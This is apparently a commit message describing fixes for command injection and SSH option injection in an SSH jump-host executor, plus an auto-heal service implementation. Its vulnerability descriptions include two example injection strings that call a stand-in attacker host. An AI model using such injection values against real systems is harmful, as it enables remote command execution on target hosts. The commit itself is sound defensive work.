Issues fixed:
1. [HIGH] OS Command Injection in execute_command() (CWE-78)
command was accepted as a string and passed as the final SSH positional
arg. Remote SSH executes it via sh -c, so shell metacharacters in
command (semicolons, pipes, backticks) are interpreted.
e.g. command="id; curl attacker.com" → two commands execute on target.
Fix: command parameter changed to List[str]; TypeError raised if str
is passed; SSH cmd built with ['--, *command] so remote shell sees
argv, not a shell string. '--' stops SSH from interpreting options.
2. [HIGH] SSH Option Injection via host/user parameters (CWE-88)
jump_host, target_host, jump_user, target_user were unsanitized.
Attacker-controlled host like "-oProxyCommand=curl attacker.com #"
could inject SSH options.
Fix: _validate_host() / _validate_user() with strict regex on init
and in execute_command(); ValueError raised on invalid input.
3. [BUG] AutoHealService.handle_exception() did not exist
elephant_alpha_autonomous_engine.py imports and calls
AutoHealService().handle_exception() — this would raise AttributeError
at runtime. AutoHealService is now fully implemented:
- Playbook lookup from DB (autoheal_models.Playbook)
- ALLOWED_ACTION_TYPES allowlist (DOCKER_RESTART/WAIT_RETRY/ALERT_ONLY/SSH_CMD)
- DOCKER_RESTART: static ['docker','restart',<validated_container>]
- SSH_CMD: requires action_params.argv as list; host/user validated
4. [DESIGN] Duplicate SSHJumpExecutor across two files
auto_heal_service.py and openclaw_strategist_service.py were byte-for-
byte copies. Single source of truth now in auto_heal_service.py;
openclaw_strategist_service.py re-exports SSHJumpExecutor.
Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>